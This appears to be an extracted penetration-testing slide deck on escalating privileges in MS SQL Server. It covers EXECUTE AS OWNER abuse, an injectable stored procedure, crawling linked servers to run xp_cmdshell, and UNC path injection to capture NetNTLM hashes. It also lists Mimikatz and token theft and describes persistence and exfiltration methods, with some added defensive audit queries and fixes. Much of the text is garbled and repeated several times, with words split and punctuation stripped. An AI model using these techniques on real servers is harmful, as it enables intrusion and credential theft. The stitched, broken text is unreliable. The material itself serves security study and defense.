bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths.
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker.
• An attacker can then capture the NetNTLM password hash and crack or relay it.
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts.

Escalating Privileges: UNC Path Injection
Oh yeah…
By DEFAULT, the PUBLIC role can execute (at least) two procedures that accept a file path: xp_dirtree, xp_fileexist
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account's NetNTLM password hash by default.

Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
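Added example (not from the deck): a check of who can call the two file-path procedures named above, run from master where they live, followed by the mitigation. It assumes only the standard catalog views and permission functions.

```sql
-- Added example, not from the deck: who can call the file-path procedures the slide names,
-- checked from the master database where they live, plus the mitigation.
USE master;
GO
-- Explicit EXECUTE grants on the two procedures. A fresh install returns a GRANT to public
-- for both; any other grantee listed here was added locally.
SELECT o.name           AS procedure_name,
       pr.name          AS grantee,
       dp.state_desc,
       dp.permission_name
FROM sys.database_permissions dp
JOIN sys.all_objects o          ON o.object_id = dp.major_id AND dp.class = 1  -- class 1 = object
JOIN sys.database_principals pr ON pr.principal_id = dp.grantee_principal_id
WHERE o.name IN ('xp_dirtree', 'xp_fileexist')
ORDER BY o.name, pr.name;
GO
-- The same question from the caller's side: run this as a low-privileged login.
-- 1 = this login can call the procedure and therefore make the service account open a UNC path.
SELECT HAS_PERMS_BY_NAME('master.dbo.xp_dirtree',   'OBJECT', 'EXECUTE') AS can_exec_xp_dirtree,
       HAS_PERMS_BY_NAME('master.dbo.xp_fileexist', 'OBJECT', 'EXECUTE') AS can_exec_xp_fileexist;
GO
-- Mitigation: remove the default grant from public. Sysadmins bypass object permission checks,
-- so admin tooling that browses files through xp_dirtree keeps working; test non-admin
-- applications before applying this in production.
-- REVOKE EXECUTE ON xp_dirtree   FROM public;
-- REVOKE EXECUTE ON xp_fileexist FROM public;
```

Revoking the two grants only closes the default path the slide describes; any other procedure that accepts a file path, and any sysadmin, can still make the service account authenticate outbound. Restricting outbound SMB from database hosts and enforcing SMB signing on the servers it may be relayed to address the capture-and-relay step itself.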
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.

Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges: OS Admin to SysAdmin

Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways.
2. All SQL Server versions provide the service account with sysadmin privileges.
Escalating Privileges: OS Admin to SysAdmin

Approach             2000  2005  2008  2012  2014  2016
LSA Secrets           x     x     x     x     x     x
Local Administrator   x     x
LocalSystem           x     x     x
Process Migration     x     x     x     x     x     x
Token Stealing        x     x     x     x     x     x
Single User Mode            x     x     x     x     x

Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options:

Approach                                                      Common Tools
Access as Local Administrator                                 Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                         Psexec, accessibility options, debugger, with native SQL client tools
Recover SQL Server service account password from LSA Secrets  Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process   Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process    Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                              DBATools
Common Post Exploitation Activities

Post Exploitation Overview
Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet.)
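Added example (not from the deck): baseline queries for the SQL Server-layer persistence mechanisms listed under item 1 (startup procedures, agent jobs, triggers, modified code). They use only standard catalog views and msdb tables; the seven-day window is an assumed review cadence.

```sql
-- Added example, not from the deck: enumerate the SQL Server-layer persistence points listed
-- above. Run on each instance and diff the output against a known-good copy.

-- Startup procedures: live in master and run as the service account every time the service starts.
SELECT p.name AS startup_procedure, p.create_date, p.modify_date
FROM master.sys.procedures p
WHERE OBJECTPROPERTY(p.object_id, 'ExecIsStartup') = 1;
GO
-- Server-level triggers (logon triggers and server-scoped DDL triggers).
SELECT name, type_desc, is_disabled, create_date, modify_date
FROM sys.server_triggers;
GO
-- Database-scoped DDL triggers in the current database (not listed in sys.objects).
SELECT name, type_desc, is_disabled, create_date, modify_date
FROM sys.triggers
WHERE parent_class = 0;   -- 0 = database
GO
-- SQL Agent jobs with their steps: who owns them, what they run and in which subsystem
-- (CmdExec and PowerShell steps run OS commands as the Agent service account or a proxy).
SELECT j.name                   AS job_name,
       SUSER_SNAME(j.owner_sid) AS owner_login,
       j.enabled,
       s.step_id, s.subsystem, s.command,
       j.date_modified
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobsteps s ON s.job_id = j.job_id
ORDER BY j.date_modified DESC;
GO
-- Modified code: user-defined procedures, DML triggers, functions and views changed in the last
-- seven days (assumed review window) in the current database. Run per database.
SELECT SCHEMA_NAME(o.schema_id) + '.' + o.name AS object_name,
       o.type_desc,
       o.modify_date
FROM sys.objects o
WHERE o.type IN ('P', 'TR', 'FN', 'TF', 'IF', 'V')
  AND o.is_ms_shipped = 0
  AND o.modify_date >= DATEADD(day, -7, SYSDATETIME())
ORDER BY o.modify_date DESC;
GO
```

A job or trigger is only suspicious in context, so the useful artefact is the diff: store each run's output and alert on new rows, changed commands, or an owner_login that is a sysadmin on a job nobody recognises.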
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation/Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login.
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires database to be configured as trustworthy for OS command execution
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation/Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login.
• DB_OWNER role can impersonate the actual database owner.

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO

(Callout on the slide: SYSADMIN is often the OWNER.)
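The conditions that make sp_escalate_me work are all visible in the catalog, so here is an added audit (not code from the deck) that lists them and the two settings that break the chain. MyAppDb and MyAppUser are the slide's names; MyAppDbOwnerLogin is a placeholder for a low-privileged login.

```sql
-- Added example, not from the deck: find the preconditions behind sp_escalate_me and
-- show the settings that break the chain.

-- Server-wide: which user databases are TRUSTWORTHY, and is their owner a sysadmin?
-- Both together let a db_owner reach server scope through EXECUTE AS OWNER.
SELECT d.name                                                  AS database_name,
       SUSER_SNAME(d.owner_sid)                                AS owner_login,
       d.is_trustworthy_on,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid))  AS owner_is_sysadmin
FROM sys.databases d
WHERE d.database_id > 4                   -- skip master, tempdb, model, msdb
ORDER BY d.is_trustworthy_on DESC, d.name;
GO
USE MyAppDb;   -- the database from the slide
GO
-- Who is db_owner here? Each member can create a procedure WITH EXECUTE AS OWNER.
SELECT m.name AS member, m.type_desc
FROM sys.database_role_members rm
JOIN sys.database_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.database_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'db_owner';
GO
-- Modules that run under an identity other than the caller.
-- sys.sql_modules.execute_as_principal_id: NULL = CALLER, -2 = OWNER, otherwise a database principal.
SELECT SCHEMA_NAME(o.schema_id) + '.' + o.name AS module_name,
       o.type_desc,
       CASE m.execute_as_principal_id
            WHEN -2 THEN 'OWNER'
            ELSE USER_NAME(m.execute_as_principal_id)
       END                                     AS executes_as,
       o.modify_date
FROM sys.sql_modules m
JOIN sys.objects o ON o.object_id = m.object_id
WHERE m.execute_as_principal_id IS NOT NULL
ORDER BY o.modify_date DESC;
GO
-- Mitigations: remove the conditions rather than hunting every procedure.
-- ALTER DATABASE MyAppDb SET TRUSTWORTHY OFF;                        -- OWNER context stays inside the database
-- ALTER AUTHORIZATION ON DATABASE::MyAppDb TO [MyAppDbOwnerLogin];  -- owner is a low-privileged login (placeholder name)
```

With TRUSTWORTHY off, a procedure executing as OWNER still impersonates the database owner inside the database, but the impersonated identity is not trusted at server scope, so sp_addsrvrolemember in sp_escalate_me fails; changing the owner to a login that is not a sysadmin removes the prize even where TRUSTWORTHY must stay on.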
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation/Injection Issues
• Use signed procedures
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user context
• Limit commands and queries
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as trustworthy for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
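The seven steps above carried out in T-SQL, as an added example (not code from the deck). MyAppDb and MyAppUser are the slide's names; ReadSessionsCert, ReadSessionsCertLogin, dbo.usp_ReadServerSessions, the master-key password and the C:\certs export path are placeholders chosen here. The procedure needs VIEW SERVER STATE, a server-level permission its callers do not hold.

```sql
-- Added example, not from the deck: a certificate-signed procedure in the slide's step order.
-- All names, the password and the export path are placeholders.
USE MyAppDb;
GO
-- 1. The stored procedure that needs a permission its callers do not hold.
--    VIEW SERVER STATE is server-level; callers only ever get this query's result.
CREATE PROCEDURE dbo.usp_ReadServerSessions
AS
BEGIN
    SET NOCOUNT ON;
    SELECT session_id, login_name, host_name, program_name
    FROM sys.dm_exec_sessions
    WHERE is_user_process = 1;
END
GO
-- 2. Database master key: protects the certificate's private key inside MyAppDb.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'Dmk-Placeholder-ChangeMe-1!';
GO
-- 3. Certificate. The private key stays in this database and is used only to sign.
CREATE CERTIFICATE ReadSessionsCert WITH SUBJECT = 'Signs dbo.usp_ReadServerSessions';
GO
-- Export only the public half so master can derive a login from it; no private key leaves MyAppDb.
-- The SQL Server service account needs write access to the export directory.
BACKUP CERTIFICATE ReadSessionsCert TO FILE = 'C:\certs\ReadSessionsCert.cer';
GO
USE master;
GO
-- 4. Login created from the certificate. Nobody can connect as it; it exists only so that
--    permissions can be attached to it.
CREATE CERTIFICATE ReadSessionsCert FROM FILE = 'C:\certs\ReadSessionsCert.cer';
GO
CREATE LOGIN ReadSessionsCertLogin FROM CERTIFICATE ReadSessionsCert;
GO
-- 5. Configure login privileges: exactly the one permission the procedure body needs.
GRANT VIEW SERVER STATE TO ReadSessionsCertLogin;
GO
USE MyAppDb;
GO
-- 6. Sign the procedure. While it runs, the signature adds ReadSessionsCertLogin's permissions
--    to the caller's token; the caller's own identity is otherwise unchanged.
ADD SIGNATURE TO dbo.usp_ReadServerSessions BY CERTIFICATE ReadSessionsCert;
GO
-- 7. Let the low-privileged application user run it.
GRANT EXECUTE ON dbo.usp_ReadServerSessions TO MyAppUser;
GO
```

Two operational points: ALTER PROCEDURE invalidates the signature, so every code change must be followed by a fresh ADD SIGNATURE (a deployment step worth automating, and a good audit signal when it is missing), and because the grant is attached to the certificate login rather than to the database owner, the "owner is often a sysadmin" problem of the EXECUTE AS OWNER pattern does not arise.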
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb''';
EXECUTE(@query)
END
GO
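The same lookup as sp_sqli2 with the injection removed, added here as an example (not code from the deck): the user input is passed as a parameter of the dynamic statement instead of being concatenated into it, so an EXECUTE AS OWNER procedure built this way cannot be turned into an impersonation primitive through its input. sp_sqli2_fixed is a name chosen here; MyAppDb is the slide's database.

```sql
-- Added example, not from the deck: sp_sqli2 without the injection.
USE MyAppDb;
GO
CREATE PROCEDURE sp_sqli2_fixed
    @DbName sysname                      -- database names are sysname, not varchar(max)
AS
BEGIN
    SET NOCOUNT ON;
    -- The statement text is a constant; @DbName never becomes part of it. A value such as
    --   x' OR 1=1 --
    -- is therefore compared as a (non-existent) database name instead of being parsed as SQL,
    -- whatever security context the procedure runs under.
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM sys.databases WHERE name LIKE N''%'' + @p + N''%'' OR name = N''tempdb'';';
    EXEC sp_executesql @query, N'@p sysname', @p = @DbName;
END
GO
-- Usage: both calls run the identical statement; only the parameter value differs.
EXEC sp_sqli2_fixed @DbName = N'MyApp';
EXEC sp_sqli2_fixed @DbName = N'x'' OR 1=1 --';
```

Two notes on the design: the statement does not need to be dynamic at all (a plain SELECT ... WHERE name LIKE '%' + @DbName + '%' is simpler and equally safe), and LIKE still treats % and _ in the parameter as wildcards, so escape them with the ESCAPE clause if the caller must not be able to widen the match.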
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands.
2. OS commands run as the SQL Server service account.
3. Service accounts have sysadmin privileges by default.
4. Companies often use a single domain account to run hundreds of SQL Servers.
5. So if you get sysadmin on one server, you have it on all of them.
One account to rule them all.
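Two instance-level checks behind the shared-service-account reasoning above and the OS Admin to SysAdmin version table earlier, added as an example (not code from the deck). They use only the standard catalog views and sys.dm_server_services, which exists from SQL Server 2008 R2 SP1 onwards.

```sql
-- Added example, not from the deck: which account runs this instance, and who is sysadmin.

-- Which Windows account runs each SQL Server service on this instance? Collect service_account
-- from every instance in the estate; an account that shows up on many hosts is the
-- "one account to rule them all" case. (sys.dm_server_services: SQL Server 2008 R2 SP1 and later.)
SELECT servicename, service_account, startup_type_desc, status_desc
FROM sys.dm_server_services;
GO
-- Who holds sysadmin, directly or through a Windows group? BUILTIN\Administrators (default
-- sysadmin through 2005) and NT AUTHORITY\SYSTEM (default sysadmin through 2008) are the
-- memberships that make the "Local Administrator" and "LocalSystem" rows of the version table
-- work; on later versions they are present only if someone added them back.
SELECT m.name        AS member_login,
       m.type_desc,
       m.is_disabled,
       CASE WHEN m.name IN ('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM')
            THEN 'built-in OS principal: remove from sysadmin'
            ELSE '' END AS note
FROM sys.server_role_members rm
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.type_desc, m.name;
GO
```

Grouping the first query's service_account column across all instances is the defender's version of the attacker's shared-account map: each account that runs more than one instance defines a blast radius, and splitting those instances across dedicated (or group managed) service accounts shrinks it.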
[Figure: "Leveraging Shared MS SQL Server Service Accounts", built up over four slides. Network zones: Internet, DMZ and Intranet, containing an LRA, an HVA, two LVAs and ADS; ports 80 and 443 are open from the Internet into the DMZ, ports 1433 and 1434 from the DMZ into the intranet. Step 1: the attacker ("Captain Evil") uses SQL injection against an LVA. Step 2: execute a local command via xp_cmdshell. Step 3: access to the HVA with the shared domain service account; execute commands and gather data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application.]
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
